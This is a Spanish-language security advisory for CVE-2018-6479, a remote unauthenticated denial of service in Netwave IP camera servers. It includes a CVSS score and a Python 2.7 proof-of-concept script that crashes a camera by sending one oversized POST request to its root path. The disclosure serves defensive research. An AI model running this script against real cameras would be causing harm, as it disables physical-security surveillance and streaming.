
[CVE-2018-6479] Servidor de cámara IP Netwave vulnerable a Denegación de Servicio mediante una sola y enorme solicitud POST.
| CVE | Descripción |
|---|---|
| CVE-2018-6479 | Vulnerabilidad de denegación de servicio remota no autenticada |
| CVSS | Puntuación | Detalles |
|---|---|---|
| 3 | 7.3 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:X/RL:W/RC:X |
Durante una investigación de seguridad en IoT, se han descubierto algunas vulnerabilidades en diferentes fabricantes de cámaras IP. Netwave IP Camera es un servidor de cámara IP que permite ver el video de la cámara y administrarla. Las cámaras IP se utilizan especialmente para fines de seguridad física y control, por lo que su disponibilidad es crucial.
Cualquier cámara IP Netwave puede ser derribada simplemente enviando una solicitud POST enorme a su ruta raíz. Una vez que se envía la solicitud, el dispositivo se bloquea y deja de transmitir audio y video.
Prueba de concepto: Ejecute el siguiente script de Python 2.7 contra cualquier cámara IP NetWave, dejará de responder y de transmitir video/audio al instante.
import string
import httplib
import urllib2
host = "CAMERA_IP"
port = 80
params='A'*9999999 # Huge body
headers = {
"Host": host + ':' + str(port),
"Connection": "keep-alive",
"Content-Length": 9999999,
}
url = "/"
conn = httplib.HTTPConnection(host,port=port)
conn.request("POST",url,params,headers)
response = conn.getresponse()
data = response.read()
print data
Gonzalo García León